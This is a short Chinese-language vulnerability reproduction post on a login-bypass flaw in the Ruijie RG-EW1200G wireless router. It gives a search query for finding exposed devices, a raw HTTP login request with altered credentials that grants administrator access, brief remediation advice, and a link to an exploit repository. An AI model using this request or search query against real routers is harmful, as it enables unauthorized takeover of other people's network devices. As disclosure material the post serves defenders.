【漏洞复现】锐捷 RG-EW1200G 无线路由器 登录绕过

》》》产品描述《《《

        锐捷网络RG-EW1200G是一款有线无线全千兆双频无线路由器Q，适合平层家居、别墅、小型店铺、SOHO办公等场景使用。设备性能卓越，足以满足千兆上网需求;信号强劲，信号功率功率提升3倍，覆盖距离提升近1倍覆盖能力强。        

---

》》》漏洞描述《《《

        锐捷网络 RG-EW1200G 存在登录绕过逻辑漏洞，允许任何用户无需密码即可获得设备管理员权限

---

》》》搜索语句《《《

body="static/css/app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"

---

》》》漏洞复现《《《

登录时抓包修改账号

POST /api/sys/login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Length: 66
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded

{"username":"2","password":"1231111111","timestamp":1692412880000}

---

》》》修复建议《《《

        为了确保系统安全，建议你采取以下措施:首先，除非特别需要，尽量不要让系统连上互联网，以减少被黑客攻击的风险。其次，通过防火墙等安全设备设定访问规则，只允许经过批准的设备访问系统，这样可以有效控制谁能进入系统。最后，务必将产品更新到最新版本，以及时修复已知的安全漏洞，保持系统的安全性。

---

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------